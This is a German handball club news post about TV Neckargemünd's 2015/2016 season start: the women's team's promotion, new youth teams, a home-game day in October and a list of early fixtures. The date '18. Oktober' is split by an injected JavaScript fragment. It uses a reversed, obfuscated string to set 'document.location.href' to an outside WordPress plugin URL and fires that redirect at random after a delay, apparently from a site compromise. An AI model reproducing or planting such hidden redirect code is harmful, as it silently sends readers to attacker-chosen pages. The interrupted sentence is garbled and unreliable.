Start in die neue Saison 2015/2016!

Am kommenden Wochenende starten unsere Mannschaften wieder in die neue Saison. Die Damenmannschaft ist ja in die 1. Kreisliga aufgestiegen und wir hoffen, dass sie sich dort gut etablieren können. Im Jugendbereich gibt es Verstärkung: es gibt nun wieder eine D-Jugend, und sogar zwei E-Jugend-Mannschaften! Die weibliche C-Jugend hat eine Spielgemeinschaft mit Bammental, die jungen Damen laufen in den Bammentaler Trikots auf.

Der erste komplette Heimspieltag ist am 18. Oktoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tober, dort werden alle Mannschaften vorgestellt, gegen 14:00 geht es los mit der Vorstellung. Für das leibliche Wohl ist gesorgt!

Wer unsere Mannschaften schon vorher anfeuern will – hier die ersten Heimspiele; alle anderen starten zu Hause erst am 18.10.:

  • Samstag, den 19.09.: männliche C-Jugend 12:30, männliche B-Jugend 14:00
  • Samstag, den 03.10.: männliche D-Jugend 10:30, männliche C-Jugend 13:15, männliche B-Jugend 14:45
  • Dienstag, den 06.10.: Männer 1 20:00

Übrigens: wer alle Spiele des TV Neckargemünd (Termine und Ergebnisse) verfolgen will, kann das auf den Seiten des Handballkreises Heidelberg tun (die Vereinsnummer des TVN ist die 22043).

Und wer gemeinsam mit den Handballern am Samstag und Sonntag etwas feiern möchte, der kann gerne zu unseren Ständen auf der Kleingemünder Kerwe kommen!